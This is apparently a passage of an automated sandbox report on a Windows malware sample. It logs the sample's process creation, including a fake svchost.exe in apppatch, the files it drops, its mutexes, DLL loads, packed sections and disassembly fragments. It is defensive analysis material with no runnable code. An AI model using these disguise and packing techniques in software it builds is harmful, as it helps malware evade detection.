Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Program Files (x86)\Windows Defender\vonypom.com
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\login[1].htm
Source: C:\Windows\apppatch\svchost.exe, Mutant created: NULL
Source: C:\Windows\apppatch\svchost.exe, Mutant created: \Sessions\1\BaseNamedObjects\69889106a
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3816
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6928
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5368
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4976
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, File created: C:\Users\user\AppData\Local\Temp\BB59.tmp
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: OjKmJJm2YT.exe, String found in binary or memory: -help
Source: svchost.exe, String found in binary or memory: -help
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, File read: C:\Users\user\Desktop\OjKmJJm2YT.exe
Source: unknown, Process created: C:\Users\user\Desktop\OjKmJJm2YT.exe "C:\Users\user\Desktop\OjKmJJm2YT.exe"
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 772
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 736
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 800
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: opengl32.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: winmm.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: glu32.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: vmhgfs.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: samcli.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: mpclient.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: version.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: firewallapi.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: fwbase.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: apphelp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: opengl32.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winmm.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: glu32.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: vmhgfs.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: netapi32.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: samcli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: netutils.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: sspicli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wldp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mpclient.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: version.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: msasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: profapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: firewallapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwbase.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winscard.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: devobj.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: sensapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dbghelp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wininet.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iertutil.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winhttp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mswsock.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winnsi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: urlmon.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: srvcli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: schannel.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mskeyprotect.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ntasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: msasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: gpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ncrypt.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ncryptsslp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: napinsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: pnrpnsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wshbth.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: nlaapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winrnr.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winsta.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: winscard.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: devobj.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: sensapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: netapi32.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: samcli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: netutils.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: wininet.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: wldp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: sspicli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: iertutil.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: profapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: OjKmJJm2YT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nFjEHtbDTFjy.exe, 00000005.00000000.1672686954.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000006.00000002.1795769994.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000007.00000002.1780570957.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000000B.00000002.1782306415.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000000E.00000002.1690242673.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000010.00000002.1703422798.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000015.00000002.1707411843.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000018.00000000.1704279183.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001A.00000002.1712407341.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001C.00000000.1711075961.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001E.00000002.1719589028.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000020.00000000.1717183667.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000022.00000002.1729620714.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000024.00000002.1732605635.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000026.00000000.1731444284.000000000014E000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\OjKmJJm2YT.exeUnpacked PE file: 0.2.OjKmJJm2YT.exe.400000.2.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeUnpacked PE file: 0.2.OjKmJJm2YT.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: OjKmJJm2YT.exeStatic PE information: real checksum: 0x29533cca should be: 0x3615e
Source: svchost.exe.0.drStatic PE information: real checksum: 0x3d7bb841 should be: 0x3615e
Source: OjKmJJm2YT.exeStatic PE information: section name: .D
Source: OjKmJJm2YT.exeStatic PE information: section name: .SC
Source: OjKmJJm2YT.exeStatic PE information: section name: .Wp
Source: OjKmJJm2YT.exeStatic PE information: section name: .aS
Source: OjKmJJm2YT.exeStatic PE information: section name: .vtzr
Source: OjKmJJm2YT.exeStatic PE information: section name: .fvH
Source: OjKmJJm2YT.exeStatic PE information: section name: .Lx
Source: OjKmJJm2YT.exeStatic PE information: section name: .sOZF
Source: OjKmJJm2YT.exeStatic PE information: section name: .h
Source: svchost.exe.0.drStatic PE information: section name: .D
Source: svchost.exe.0.drStatic PE information: section name: .SC
Source: svchost.exe.0.drStatic PE information: section name: .Wp
Source: svchost.exe.0.drStatic PE information: section name: .aS
Source: svchost.exe.0.drStatic PE information: section name: .vtzr
Source: svchost.exe.0.drStatic PE information: section name: .fvH
Source: svchost.exe.0.drStatic PE information: section name: .Lx
Source: svchost.exe.0.drStatic PE information: section name: .sOZF
Source: svchost.exe.0.drStatic PE information: section name: .h
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B895 push cs; retf 0004h0_2_0044B8F5
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044E89D push es; iretd 0_2_0044E8AC
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B55E pushad ; ret 0_2_0044B569
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B56A push eax; ret 0_2_0044B56D
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B576 push ss; ret 0_2_0044B579
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044EF69 push cs; iretd 0_2_0044EF78
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044EF33 push cs; ret 0_2_0044EF48
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00720678 push dword ptr [esp+48h]; ret 0_2_00720747
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0072065B push ebx; ret 0_2_00720677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B895 push cs; retf 0004h2_2_0044B8F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E89D push es; iretd 2_2_0044E8AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B1E0 push eax; ret 2_2_0044B20E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B55E pushad ; ret 2_2_0044B569
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B56A push eax; ret 2_2_0044B56D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B576 push ss; ret 2_2_0044B579
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF69 push cs; iretd 2_2_0044EF78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF33 push cs; ret 2_2_0044EF48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B33 push cs; ret 2_2_02BF8B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B69 push cs; iretd 2_2_02BF8B78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF849D push es; iretd 2_2_02BF84AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF4DE0 push eax; ret 2_2_02BF4E0E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E0678 push dword ptr [esp+48h]; ret 2_2_023E0747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E065B push ebx; ret 2_2_023E0677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46895 push cs; retf 0004h2_2_02A468F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A368D2 push ebp; retf 2_2_02A368D3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A461E0 push eax; ret 2_2_02A4620E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3664C push ebp; retf 2_2_02A3664D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4656A push eax; ret 2_2_02A4656D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46576 push ss; ret 2_2_02A46579
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4655E pushad ; ret 2_2_02A46569

Persistence and Installation Behavior

